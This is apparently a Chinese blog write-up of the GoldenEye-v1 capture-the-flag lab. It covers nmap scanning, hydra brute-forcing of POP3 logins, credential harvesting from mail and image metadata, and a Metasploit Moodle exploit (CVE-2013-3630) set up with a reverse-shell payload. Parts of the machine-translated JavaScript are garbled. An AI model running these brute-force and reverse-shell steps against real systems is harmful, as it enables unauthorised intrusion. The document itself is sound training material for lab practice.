首页 > 其他分享 >GoldenEye-v1靶场

GoldenEye-v1靶场

时间:2024-10-10 13:47:08浏览次数:3  
标签:boris GoldenEye --- v1 &# natalya ubuntu 靶场 邮件

通过netdiscover主机发现探测出靶场ip

通过nmap扫描工具进行全端口扫描

发现开了25,80,5006,5007这四个端口

访问80端口

百度翻译结果:

Severnaya辅助控制站

****绝密访问****

访问服务器标识

服务器名称:。。。。。。。。。。。。。。。。。。。。

GOLDENEYE

用户:未知

导航到/sev主页/登录

======================================================================================================================================

查看网页源代码

发现http://192.168.100.141/terminal.js

百度翻译一下

var数据=[

{

GoldenEyeText:“<span><br/>Severnaya辅助控制站<br/>***绝密访问***<br/>访问服务器标识<br/>服务器名称:…………..<br/>GOLDENEYE<br/><br/>用户:未知<br/></span>导航到/sev主页/登录</span>”

}

];

//

//Boris,请确保更新默认密码。

//我的消息来源说军情六处可能计划渗透。

//留意任何可疑的网络流量。。。。

//

//我在下面给你编码了p@ssword。。。

//

//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;

//

//BTW Natalya说她可以破解你的密码

//

var allElements=document.getElementsByClassName(“typeing”);

for(var j=0;j<allElements.length;j++){

var currentElementId=所有元素[j].id;

var currentElementIdContent=data[0][currentElementId];

var元素=document.getElementById(currentElementId);

var devTypeText=currentElementIdContent;

var i=0,isTag,text;

(函数类型(){

text=devTypeText.stice(0,++i);

if(text===devTypeText)返回;

element.innerHTML=text+`<span class='linker'>&#32</跨度;跨越;持续时间;(桥或拱的)墩距;跨距; 包括(广大地区)

var char=文本.切片(-1);

if(char==“<”)isTag=true;

if(char==“>”)isTag=false;

if(isTag)return type();

setTimeout(类型,60);

})();

}

发现密码为&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;

我们html解码获得密码:InvincibleHack3r

获得账号:boris,natalya

最后账号为:boris

======================================================================================================================================

访问http://192.168.100.141/sev-home/看到此页面

翻译右侧goldeneye页面英文

翻译得到:

GoldenEye

GoldenEye是苏联的一个绝密恐怖武器项目。由于您可以访问,您肯定持有绝密许可,并有资格成为经认证的GoldenEye网络运营商(GNO)

请向合格的GNO主管发送电子邮件,接受在线GoldenEye操作员培训,成为GoldenEyes系统的管理员

请记住,由于模糊安全性非常有效,我们已将pop3服务配置为在非常高的非默认端口上运行

从这个话中我们理解到有pop3服务我们通过nmap扫描得到端口为5006,5007

因我们拿到两个用户一个是boris还有一个是natalya

我们用hydra去爆破pop3服务

我们将用户写进aaa文件

进行爆破

hydra -L aaa.txt -P /usr/share/wordlists/fasttrack.txt 192.168.100.141 -s 55007 pop3

得到两组账号密码

[55007][pop3] host: 192.168.100.141 login: natalya password: bird

[55007][pop3] host: 192.168.100.141 login: boris password: secret1!

用户:boris 密码:secret1!

用户:natalya 密码:bird

============================================================================================================

我们进行登录pop3邮件系统

可通过nc还有telnet进行登录

nc/telnet 192.168.4.202 55007 ---登录邮箱

user boris ---登录用户

pass secret1! ---登录密码

list ---查看邮件数量

retr 1~3 ---查看邮件内容

登录boris用户发现有三封邮件

第一封邮件:

鲍里斯,我是管理员。你可以在这里与同事和学生进行电子交流。我不会扫描电子邮件的安全风险,因为我信任你和这里的其他管理员。

第二封邮件是natalya发送给boris的:

返回路径:<natalya@ubuntu>

X-Original-To:boris

交付至:boris@ubuntu

已接收:来自ok(localhost[120.0.1])

通过ubuntu(Postfix)与ESMTP id C3F2B454B1

对于<boris>;1995年4月21日,星期二19:42:35-0700(PDT)

消息Id:<20180425024249.C3F2B454B1@ubuntu>

日期:1995年4月21日星期二19:42:35-0700(PDT)

从…起natalya@ubuntu

鲍里斯,我可以破解你的密码!

第三封邮件

返回路径:<[email protected]>

X-Original-To:boris

交付至:boris@ubuntu

收到:来自janus(localhost[120.0.1])

通过ubuntu(Postfix)与ESMTP id 4B9F4454B1

对于<boris>;1995年4月22日,星期三19:51:48-0700(PDT)

消息Id:<20180425025235.4B9F4454B1@ubuntu>

日期:1995年4月22日星期三19:51:48-0700(PDT)

从…起[email protected]

Boris,

你与我们辛迪加的合作将获得巨大回报。附件是GoldenEye的最终访问代码。将它们放在此服务器根目录中的隐藏文件中,然后从此电子邮件中删除。这些acces代码只能有一组,我们需要保护它们以供最终执行。如果他们被找回并捕获,我们的计划将崩溃并付诸东流!

一旦Xenia进入训练场地并熟悉GoldenEye终端代码,我们将进入最后阶段。。。。

PS-保持安全,否则我们会受到威胁。

===================================================================

登录natalya用户发现有两封邮件

第一封邮件:

返回路径:<root@ubuntu>

X-Original收件人:natalya

交付至:natalya@ubuntu

已接收:来自ok(localhost[120.0.1])

通过ubuntu(Postfix)与ESMTP id D5EDA454B1

对于<natalya>;1995年4月10日,星期二19:45:33-0700(PDT)

消息Id:<20180425024542.D5EDA454B1@ubuntu>

日期:1995年4月10日,星期二19:45:33-0700(PDT)

从…起root@ubuntu

纳塔利娅,拜托你别再破坏鲍里斯的密码了。此外,您还是GNO的培训主管。一旦有学生被指定给你,我会给你发电子邮件。

此外,要小心可能的网络漏洞。我们有情报称,一个名叫Janus的犯罪集团正在追捕GoldenEye。

第二封邮件

返回路径:<root@ubuntu>

X-Original收件人:natalya

交付至:natalya@ubuntu

已接收:来自根目录(localhost[120.0.1])

通过ubuntu(Postfix)与SMTP id 17C96454B1

对于<natalya>;1995年4月29日,星期二20:19:42-0700(太平洋夏令时)

消息Id:<20180425031956.17C96454B1@ubuntu>

日期:1995年4月29日星期二20:19:42-0700(PDT)

从…起root@ubuntu

好的,Natalyn,我有一个新学生给你。由于这是一个新系统,如果你看到任何配置问题,请让我或boris知道,特别是它与安全有关。。。即使不是,也只是打着“安全”的幌子进入。。。它将使变更单升级,而不需要太多麻烦:)

好的,用户信誉是:

用户名:xenia

密码:RCP90ulez!

Boris验证了她是一个有效的承包商,所以只需创建帐户即可,好吗?

如果你在内部域名之外没有URL:severnaya-station.com/gnocertdir

**确保编辑您的主机文件,因为您通常在网络外远程工作。。。。

由于您是Linux用户,只需将此服务器IP指向/etc/hosts中的severnaya-station.com即可。

我们通过natalya的第二个邮件获取到一套账号密码:

用户名:xenia

密码:RCP90ulez!

还有一个主机host域名

severnaya-station.com

===================================================================

本机windows打开hosts文件

文件路径:C:\Windows\System32\drivers\etc

访问http://severnaya-station.com/gnocertdir/

随便点击一个链接

发现一个登录窗口

用户名:xenia

密码:RCP90ulez!

使用用户名密码进行登录

登录后寻找

Home / ▶ My profile / ▶ Messages --->发现有一封邮件,内容发现用户名doak

发现邮件内容没有什么我们通过hydra来破解doak账号的pop3邮件内容

[55007][pop3] host: 192.168.4.202 login: doak password: goat

获得用户名密码:doak/goat

我们登录他的邮箱

发现有一封邮件

返回路径:<doak@ubuntu>

X-Original收件人:

交付至:doak@ubuntu

已接收:来自go(localhost[120.0.1])

由Ubuntu(Postfix)使用SMTP id 97DC24549D

对于<doak>;1995年4月30日,星期二20:47:24-0700(太平洋夏令时)

消息Id:<20180425034731.97DC24549D@ubuntu>

日期:1995年4月30日星期二20:47:24-0700(PDT)

从…起doak@ubuntu

詹姆斯,

如果你正在读这篇文章,祝贺你走到这一步。你知道tradcraft是怎么运作的吧?

转到我们的培训网站并登录到我的帐户。。。。挖掘,直到你能泄露更多信息。。。。。。

username: dr_doak

password: 4England!

======================================================================================================================================

使用新的账号密码登录这个cms

发现一个文件下载下来

发现文件内容如下:

007,

I was able to capture this apps adm1n cr3ds through clear txt.

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

访问页面:severnaya-station.com/dir007key/for-007.jpg

根据邮件提示让我们检查图片内容,下载图片后,我们可以使用:

binwalk(路由逆向分析工具)

exiftool(图虫)

strings(识别动态库版本指令)

等查看jpg文件底层内容!

我们使用exiftool for-007.jpg

我们查到隐藏信息:eFdpbnRlcjE5OTV4IQ==

base64解码:

xWinter1995x!

线索中说,这是管理员用户的密码。管理员用户身份继续登陆应用程序。

用户名:admin

密码:xWinter1995x!

因为这个是moodle2.2.3版本所以我们去网上搜索可利用漏洞

======================================================================================================================================

此时我们使用Moodle 2.2.3 exp cve --> CVE-2013-3630 漏洞可利用! 29324

我们使用MSF进行渗透

msfconsole ---进入MSF框架攻击界面

search moodle ---查找 moodle类型 攻击的模块

use 0 ---调用0 exploit/multi/http/moodle_cmd_exec调用攻击脚本

set username admin ---设置用户名:admin

set password xWinter1995x! ---设置密码:xWinter1995x!

set rhost severnaya-station.com ---设置:rhosts severnaya-station.com

set targeturi /gnocertdir ---设置目录: /gnocertdir

set payload cmd/unix/reverse ---设置payload:cmd/unix/reverse

set lhost 192.168.4.231 ---设置:lhost 192.168.4.231(需要本地IP)

exploit ----执行命令

我们发现运行不成功

我们需要登录管理员账号

上图标红未知修改为PSpellShell

我们再次运行我们的kali

进入进来了,此时我们获取了shell

获取tty参考链接:

https://www.52bug.cn/hkjs/3529.html

标签:boris,GoldenEye,---,v1,&#,natalya,ubuntu,靶场,邮件
From: https://blog.csdn.net/m0_62484818/article/details/142784659

相关文章

  • 鲲鹏(arm64)+麒麟V10离线部署KubeSphere3.4.1(精简版 离线包Windows制作)
    前提条件Windows上安装DockerDesktop+WSL。麒麟V10k8s系统初始化的依赖已下载(若没下载过,可参考上篇至鲲鹏麒麟服务器下载或Windows手动下载)Windows手动下载,地址:https://update.cs2c.com.cn/NS/V10/V10SP2/os/adv/lic/base/aarch64/Packages/开始制作2.......
  • docker 靶场 笔记
    docker靶场笔记搜索镜像容器sudodockersearchdvwa查看所有镜像容器dockerps-a下载指定的镜像并在后台启动dockerrun-itd-p虚拟机的端口:容器端口--name=自定义镜像名镜像名dockerrun-itd-p8081:80--name=dvwacitizenstig/dvwa关闭镜像......
  • 基于yolov10的花卉识别检测,支持图像、视频和摄像实时检测【pytorch框架、python】
    更多目标检测和图像分类识别项目可看我主页其他文章功能演示:基于yolov10的花卉识别检测系统,支持图像、视频和摄像实时检测【pytorch框架、python】_哔哩哔哩_bilibili(一)简介基于yolov10的花卉识别检测系统是在pytorch框架下实现的,这是一个完整的项目,包括代码,数据集,训练好的......
  • 调用sdapi/v1/txt2img接口,报错“Couldn‘t load custom C++ ops”
    后端启动stable_diffusion的api接口nohuppythonlaunch.py --use-cpuall--skip-torch-cuda-test   --api--api-log  --listen--server-name192.168.1.204>/home/third_party_app/llm/stable-diffusion-webui/logs/all.log2>&1 &服务接口http://192.168......
  • 《DNK210使用指南 -CanMV版 V1.0》第二十八章 音频播放实验
    第二十八章音频播放实验1)实验平台:正点原子DNK210开发板2)章节摘自【正点原子】DNK210使用指南-CanMV版V1.03)购买链接:https://detail.tmall.com/item.htm?&id=7828013987504)全套实验源码+手册+视频下载地址:http://www.openedv.com/docs/boards/k210/ATK-DNK210.html5)正点原......
  • 推荐!专业Substance 3D Painter v10.解锁版下载及安装 (3D绘画软件)
    AdobeSubstance3DPainter简称Pt,是一款由adobe公司新研发的3D绘画软件。Substance3DPainter具有前所未有的功能和工作流程改进,使为3D资产创建纹理变得比以往更容易。具体安装方式如下:下载地址:Substance3DPainterv10.解锁版下载1、解压后点击如下图运行2、选择安装......
  • YOLOv11改进 | 注意力篇 | YOLOv11引入24年最新Mamba注意力机制MLLAttention
    1. MLLAttention介绍1.1 摘要:Mamba是一种有效的状态空间模型,具有线性计算复杂度。最近,它在处理各种视觉任务的高分辨率输入方面表现出了令人印象深刻的效率。在本文中,我们揭示了强大的Mamba模型与线性注意力Transformer具有惊人的相似之处,而线性注意力Transforme......
  • Deformable DETR改进|爆改模型|涨点|在骨干网络和可变形编码器间加入YOLOv10的PSA和SC
    一、文本介绍本文修改的模型是Deformable-DETR,在骨干网络和可变形编码器之间加入YOLOv10的PSA和SCDown模块。其中PSA是YOLOv10提出的一种高效的自注意力模块,为了避免注意力带来的巨额开销,本文将PSA应用于可变形编码器输入的最高层级特征图。SCConv是一种空间和通道解耦的卷积......
  • 综合靶场DC-3
    一、环境搭建:1、靶场描述DC-3是另一个专门建立的易受攻击的实验室,旨在获得渗透测试领域的经验。与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有线索。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。对于......
  • Vulnhub靶场案例渗透[4]- DC3
    靶场信息靶场原地址渗透过程确定靶机ip通过虚拟机设置的网络适配器的设置,确认虚拟机的网段,使用nmap进行目标网段存活主机,确定靶机ip。nmap-sn去除已知设备的ip,得出靶机ip。确定出靶机ip的192.168.6.103探测主机开放端口nmap-A192.168.6.103已知靶机只......